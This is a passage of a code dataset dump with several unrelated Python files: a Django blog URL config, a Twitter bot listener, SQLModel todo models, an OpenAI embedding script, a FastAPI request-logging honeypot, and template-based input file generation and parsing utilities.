19, "usage_type": "attribute"}, {"api_name": "telepot.helper", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.aio.helper.Answerer", "line_number": 23, "usage_type": "call"}, {"api_name": "telepot.aio", "line_number": 23, "usage_type": "attribute"}, {"api_name": "asyncio_redis.Pool.create", "line_number": 41, "usage_type": "call"}, {"api_name": "asyncio_redis.Pool", "line_number": 41, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.cache_steam_response", "line_number": 48, "usage_type": "name"}, {"api_name": "urllib.parse.quote_plus", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 64, "usage_type": "name"}, {"api_name": "utils.SearchSuggestParser", "line_number": 69, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE.format", "line_number": 123, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE", "line_number": 123, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 146, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE.format", "line_number": 181, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE", "line_number": 181, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 184, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 184, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 203, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 206, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 221, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 224, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 228, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 253, "usage_type": "call"}, {"api_name": "constants.LANG.get", "line_number": 266, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 266, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 267, "usage_type": "call"}, {"api_name": 
"telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG.keys", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 270, "usage_type": "name"}, {"api_name": "constants.CC.get", "line_number": 278, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 278, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 279, "usage_type": "call"}, {"api_name": "telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 281, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC.keys", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 282, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 323, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 335, "usage_type": "call"}]} +{"seq_id": "43321434568", "text": "from django.conf.urls import url, include\n\nfrom . import views\n\n\napp_name = 'blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^createUser/$', views.createUser, name='createUser'),\n url(r'^registration/$', views.registration_page, name='registration_page'),\n url(r'^makepost/$', views.makepost, name='makepost'),\n url(r'^blogfeed/$', views.blogfeed, name='blogfeed'),\n url(r'^createposts/$', views.create_post, name='create_post'),\n url(r'^mylogin/$', views.mylogin, name='mylogin'),\n url(r'^logout_view/$', views.logout_view, name='logout_view'),\n url(r'^(?P[0-9]+)/$', views.singlepost, name='singlepost'),\n url(r'^savecomment/(?P[0-9]+)/$', views.savecomment, name='savecomment')\n]\n", "repo_name": "mschaeffer53/Marcel_CodeGuildPDX", "sub_path": "django/mainsite/blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "9205060333", "text": "import logging\n\nfrom responsebot.common.exceptions import UserHandlerException\n\n\nclass ResponseBotListener(object):\n \"\"\"\n Forward received tweets from :class:`~responsebot.responsebot_stream.ResponseBotStream`\n \"\"\"\n def __init__(self, handler_classes, client):\n \"\"\"\n Inits the listener and tries to create handler instances from discovered user's handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n :param client: Some Twitter API client for authentication. E.g. 
:class:`~responsebot.tweet_client.TweetClient`\n \"\"\"\n self.client = client\n self.handlers = []\n\n self.register_handlers(handler_classes)\n\n def register_handlers(self, handler_classes):\n \"\"\"\n Create handlers from discovered handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n \"\"\"\n for handler_class in handler_classes:\n try:\n self.handlers.append(handler_class(client=self.client))\n logging.info('Successfully registered {handler_class}'.format(handler_class=getattr(handler_class, '__name__', str(handler_class))))\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n\n def on_tweet(self, tweet):\n \"\"\"\n Callback to receive tweet from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the\n received tweet to registered handlers.\n\n :param tweet: An object containing a tweet's text and metadata\n :type tweet: :class:`~responsebot.models.Tweet`\n :raises :class:`~responsebot.common.exceptions.UserHandlerException`: If there is some unknown error from a custom handler\n \"\"\"\n logging.info('Received tweet: `{message}`'.format(message=tweet.text))\n\n for handler in self.handlers:\n try:\n handler.on_tweet(tweet)\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n", "repo_name": "anhhuy1605/test_rtd", "sub_path": "responsebot/listeners/responsebot_listener.py", "file_name": "responsebot_listener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "70325733608", "text": "from datetime import datetime\nfrom enum import Enum\nfrom typing import Optional\n\nfrom pydantic import BaseModel\nfrom sqlmodel import Column, DateTime, Field, ForeignKey, SQLModel\n\n\nclass TodoListBase(SQLModel):\n title: str\n description: str\n\n\nclass TodoListCreate(TodoListBase):\n pass\n\n\nclass TodoListUpdate(BaseModel):\n title: Optional[str] = None\n description: Optional[str] = None\n\n\nclass TodoList(TodoListBase, table=True):\n __tablename__ = \"todo_list\"\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: Optional[int] = Field(\n default=None, sa_column=Column(ForeignKey(\"user.id\", ondelete=\"CASCADE\"))\n )\n created_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n updated_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n\n\nclass TodoListSortingFields(str, Enum):\n id = \"id\"\n title = \"title\"\n created_date = \"created_date\"\n updated_date = \"updated_date\"\n", "repo_name": "testownik-pwr-portal/portal", "sub_path": "backend/app/app/models/todo_list.py", "file_name": "todo_list.py", "file_ext": "py", "file_size_in_byte": 1055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.SQLModel", "line_number": 9, "usage_type": "name"}, {"api_name": 
"pydantic.BaseModel", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlmodel.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "16271165720", "text": "import requests\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\npersonal_api_key = os.getenv(\"PERSONAL_API_KEY\")\nopen_ai_api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\n\ndef get_token():\n payload = {\"apikey\": personal_api_key}\n response = requests.post('https://zadania.aidevs.pl/token/embedding', json=payload)\n return response.json().get('token')\n\n\ndef create_embedding():\n token = get_token()\n data = {\"input\": 'Hawaiian pizza', \"model\": \"text-embedding-ada-002\"}\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + open_ai_api_key}\n response = requests.post('https://api.openai.com/v1/embeddings', json=data, headers=headers)\n embedding = response.json()['data'][0]['embedding']\n return embedding, token\n\n\ndef send_answer():\n embedding, token = create_embedding()\n payload = {\"answer\": embedding}\n response = requests.post(f'https://zadania.aidevs.pl/answer/{token}', json=payload)\n return response.json()\n\n\nprint(send_answer())\n", "repo_name": "bartoszc/AI_Devs", "sub_path": "embedding.py", "file_name": "embedding.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 14, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "603120841", "text": "import uvicorn as uvicorn\nimport json\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import RedirectResponse\nfrom 
fastapi.staticfiles import StaticFiles\nfrom starlette.routing import Match\nfrom loguru import logger\n\nimport os\nimport shutil\n\n# Serve our static web portal\nfrom starlette.templating import Jinja2Templates\nfrom starlette.routing import Route, Mount\nfrom starlette.exceptions import HTTPException\n\ntemplates = Jinja2Templates(directory='webapp')\nasync def not_found(request: Request, exc: HTTPException):\n return RedirectResponse(\"/index.html\")\n\nexception_handlers = {\n 404: not_found\n}\n\napp = FastAPI(openapi_url=None, exception_handlers=exception_handlers)\nshared_honeypot_dir = \"/custom_honey\"\nshared_storage_dir = \"/honey_store\"\n# Might have some static file caching issue\napp.mount(\"/\", StaticFiles(directory=f\"{shared_honeypot_dir}/webapp\", html=True, check_dir=False), name=\"webapp\")\n\n@app.middleware(\"http\")\nasync def log_middle(request: Request, call_next):\n\n # Copy Default Honeypot if folder is empty\n if os.path.isdir(f\"{shared_honeypot_dir}/webapp\") and len(os.listdir(f\"{shared_honeypot_dir}/webapp\")) == 0:\n os.rmdir(f\"{shared_honeypot_dir}/webapp\")\n shutil.copytree(\"/app/webapp\", f\"{shared_honeypot_dir}/webapp\")\n\n routes = request.app.router.routes\n send_param = None\n for route in routes:\n match, scope = route.matches(request)\n if match == Match.FULL:\n send_param = list(scope[\"path_params\"].items())\n\n send_head = request.headers.items()\n send_body = (await request.body()).decode(\"utf-8\")\n packed_boi = {\"method\":request.method,\"url\":str(request.url),\"param\":send_param,\"headers\":send_head,\"body\":send_body}\n packed_json = json.dumps(packed_boi)\n\n with open(f\"{shared_storage_dir}/fastpotlogs.json\", 'a+') as outfile:\n outfile.write(\"\\n\")\n outfile.write(packed_json)\n\n response = await call_next(request)\n return response\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host='0.0.0.0', port=8000)\n\n", "repo_name": "FA-PengFei/NGWAF", "sub_path": "ngwaf-app/fastpot/fastpotty/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "53", "api": [{"api_name": "starlette.templating.Jinja2Templates", "line_number": 17, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 18, "usage_type": "name"}, {"api_name": "starlette.exceptions.HTTPException", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi.staticfiles.StaticFiles", "line_number": 29, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 36, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 37, "usage_type": "call"}, {"api_name": "starlette.routing.Match.FULL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "starlette.routing.Match", "line_number": 43, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "9343915340", "text": "\"\"\"\nA collection of utilities for file wrapping.\n\nNote: This 
is a work in progress.\n\"\"\"\n\n\nimport re\n\ntry:\n import pyparsing\n from pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \\\n TokenConverter, Word, nums, oneOf, printables, ParserElement, alphanums\nexcept ImportError:\n pyparsing = None\n TokenConverter = object\n\nimport numpy as np\n\n\ndef _getformat(val):\n \"\"\"\n Get the output format for a floating point number.\n\n The general format is used with 16 places of accuracy, except for when\n the floating point value is an integer, in which case a decimal point\n followed by a single zero is used.\n\n Parameters\n ----------\n val : float or int\n the number which needs formatted.\n\n Returns\n -------\n string\n the format string.\n \"\"\"\n if int(val) == val:\n return \"%.1f\"\n else:\n return \"%.16g\"\n\n\nclass _SubHelper(object):\n \"\"\"\n Replaces file text at the correct word location in a line.\n\n This class contains the Helper Function that is passed to re.sub.\n\n Attributes\n ----------\n _newtext : str\n text to insert.\n _replace_location : int\n location in the file where replacement is to occur.\n _current_location : int\n current location in the file.\n _counter : int\n counter\n _start_location : int\n initial location where replacement is to occur.\n _end_location : int\n final location where replacement is to occur.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n self._newtext = \"\"\n self._replace_location = 0\n self._current_location = 0\n self._counter = 0\n self._start_location = 0\n self._end_location = 0\n\n def set(self, newtext, location):\n \"\"\"\n Set a new word location and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n location : int\n location in the file where replacement is to occur.\n \"\"\"\n self._newtext = newtext\n self._replace_location = location\n self._current_location = 0\n\n def set_array(self, newtext, start_location, end_location):\n \"\"\"\n Set a new starting location, ending location, and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n start_location : int\n location\n end_location : int\n location\n \"\"\"\n self._newtext = newtext\n self._start_location = start_location\n self._end_location = end_location\n self._current_location = 0\n\n def replace(self, text):\n \"\"\"\n Replace text in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n\n if self._current_location == self._replace_location:\n if isinstance(self._newtext, float):\n return _getformat(self._newtext) % self._newtext\n else:\n return str(self._newtext)\n else:\n return text.group()\n\n def replace_array(self, text):\n \"\"\"\n Replace array of text values in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n end = len(self._newtext)\n\n if self._current_location >= self._start_location and \\\n self._current_location <= self._end_location and \\\n self._counter < end:\n if isinstance(self._newtext[self._counter], float):\n val = self._newtext[self._counter]\n newval = _getformat(val) % val\n else:\n newval = str(self._newtext[self._counter])\n self._counter += 1\n return newval\n else:\n 
return text.group()\n\n\nclass _ToInteger(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into an int.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into an integer.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n int\n integer value for token.\n \"\"\"\n return int(tokenlist[0])\n\n\nclass _ToFloat(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into a float.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into a float.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n float value for token.\n \"\"\"\n return float(tokenlist[0].replace('D', 'E'))\n\n\nclass _ToNan(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python nan.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python nan.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for NaN.\n \"\"\"\n return float('nan')\n\n\nclass _ToInf(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python inf.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python inf.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for infinity.\n \"\"\"\n return float('inf')\n\n\nclass InputFileGenerator(object):\n \"\"\"\n Utility to generate an input file from a template.\n\n Substitution of values is supported. Data is located with a simple API.\n\n Attributes\n ----------\n _template_filename : str or None\n the name of the template file.\n _output_filename : str or None\n the name of the output file.\n _delimiter : int\n delimiter.\n _reg : int\n regular expression.\n _data : list of string\n the contents of the file, by line\n _current_row : int\n the current row of the file\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. 
Try 'pip install pyparsing'.\")\n\n self._template_filename = None\n self._output_filename = None\n\n self._delimiter = \" \"\n self._reg = re.compile('[^ \\n]+')\n\n self._data = []\n self._current_row = 0\n self._anchored = False\n\n def set_template_file(self, filename):\n \"\"\"\n Set the name of the template file to be used.\n\n The template file is also read into memory when this method is called.\n\n Parameters\n ----------\n filename : str\n Name of the template file to be used.\n \"\"\"\n self._template_filename = filename\n\n templatefile = open(filename, 'r')\n self._data = templatefile.readlines()\n templatefile.close()\n\n def set_generated_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._output_filename = filename\n\n def set_delimiters(self, delimiter):\n \"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters.\n \"\"\"\n self._delimiter = delimiter\n self._reg = re.compile('[^' + delimiter + '\\n]+')\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark.\n\n This lets you describe data by relative position. Note that a forward\n search begins at the old anchor location. If you want to restart the\n search for the anchor at the file beginning, then call ``reset_anchor()``\n before ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n\n occurrence : int, optional\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in template file %s\" %\n (anchor, self._template_filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_var(self, value, row, field):\n \"\"\"\n Change a single variable in the template relative to the current anchor.\n\n Parameters\n ----------\n value : float, int, bool, str\n New value to set at the 
location.\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n Which word in line to replace, as denoted by delimiter(s).\n \"\"\"\n j = self._current_row + row\n line = self._data[j]\n\n sub = _SubHelper()\n sub.set(value, field)\n newline = re.sub(self._reg, sub.replace, line)\n\n self._data[j] = newline\n\n def transfer_array(self, value, row_start, field_start, field_end,\n row_end=None, sep=\", \"):\n \"\"\"\n Change the values of an array in the template relative to the current anchor.\n\n This should generally be used for one-dimensional or free form arrays.\n\n Parameters\n ----------\n value : float, int, bool, str\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n row_end : int, optional\n Use if the array wraps to cover additional lines.\n sep : int, optional\n Separator to use if we go beyond the template.\n \"\"\"\n # Simplified input for single-line arrays\n if row_end is None:\n row_end = row_start\n\n sub = _SubHelper()\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n if row == row_end:\n f_end = field_end\n else:\n f_end = 99999\n\n sub.set_array(value, field_start, f_end)\n field_start = 0\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n # Sometimes an array is too large for the example in the template\n # This is resolved by adding more fields at the end\n if sub._counter < len(value):\n for val in value[sub._counter:]:\n newline = newline.rstrip() + sep + str(val)\n self._data[j] = newline\n\n # Sometimes an array is too small for the template\n # This is resolved by removing fields\n elif sub._counter > len(value):\n # TODO - Figure out how to handle this.\n # Ideally, we'd remove the extra field placeholders\n raise ValueError(\"Array is too small for the template.\")\n\n def transfer_2Darray(self, value, row_start, row_end, field_start, field_end):\n \"\"\"\n Change the values of a 2D array in the template relative to the current anchor.\n\n This method is specialized for 2D arrays, where each row of the array is\n on its own line.\n\n Parameters\n ----------\n value : ndarray\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. 
This is relative\n to the anchor, and can be negative.\n row_end : int\n Final row for the array, relative to the anchor.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n \"\"\"\n sub = _SubHelper()\n\n i = 0\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n sub.set_array(value[i, :], field_start, field_end)\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n sub._current_location = 0\n sub._counter = 0\n i += 1\n\n # TODO - Note, we currently can't handle going beyond the end of\n # the template line\n\n def clearline(self, row):\n \"\"\"\n Replace the contents of a row with the newline character.\n\n Parameters\n ----------\n row : int\n Row number to clear, relative to current anchor.\n \"\"\"\n self._data[self._current_row + row] = \"\\n\"\n\n def generate(self, return_data=False):\n \"\"\"\n Use the template file to generate the input file.\n\n Parameters\n ----------\n return_data : bool\n If True, generated file data will be returned as a string.\n\n Returns\n -------\n string\n The generated file data if return_data is True or output filename\n has not been provided, else None.\n \"\"\"\n if self._output_filename:\n with open(self._output_filename, 'w') as f:\n f.writelines(self._data)\n else:\n return_data = True\n\n if return_data:\n return '\\n'.join(self._data)\n else:\n return None\n\n\nclass FileParser(object):\n \"\"\"\n Utility to locate and read data from a file.\n\n Parameters\n ----------\n end_of_line_comment_char : str, optional\n End-of-line comment character to be ignored\n (e.g., Python supports in-line comments with \"#\").\n\n full_line_comment_char : str, optional\n Comment character that signifies a line should be skipped.\n\n Attributes\n ----------\n _filename : str\n the name of the file.\n _data : list of string\n the contents of the file, by line\n _delimiter : str\n the name of the file.\n _end_of_line_comment_char : str\n end-of-line comment character to be ignored.\n _full_line_comment_char : str\n comment character that signifies a line should be skipped.\n _current_row : int\n the current row of the file.\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. 
Try 'pip install pyparsing'.\")\n\n self._filename = None\n self._data = []\n\n self._delimiter = \" \\t\"\n self._end_of_line_comment_char = end_of_line_comment_char\n self._full_line_comment_char = full_line_comment_char\n\n self._current_row = 0\n self._anchored = False\n\n self.set_delimiters(self._delimiter)\n\n def set_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._filename = filename\n\n inputfile = open(filename, 'r')\n\n if not self._end_of_line_comment_char and not self._full_line_comment_char:\n self._data = inputfile.readlines()\n else:\n self._data = []\n for line in inputfile:\n if line[0] == self._full_line_comment_char:\n continue\n self._data.append(line.split(self._end_of_line_comment_char)[0])\n\n inputfile.close()\n\n def set_delimiters(self, delimiter):\n r\"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters. The\n default value is ' \\t', which means that spaces and tabs are not\n taken as data but instead mark the boundaries. Note that the\n parser is smart enough to recognize characters within quotes as\n non-delimiters.\n \"\"\"\n self._delimiter = delimiter\n\n if delimiter != \"columns\":\n ParserElement.setDefaultWhitespaceChars(str(delimiter))\n\n self._reset_tokens()\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark, which lets you describe data by relative position.\n\n Note that a forward search begins at the old anchor location. If you want to restart\n the search for the anchor at the file beginning, then call ``reset_anchor()`` before\n ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n occurrence : int\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. 
Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if anchor in line:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if anchor in line:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in output file %s\" %\n (anchor, self._filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n 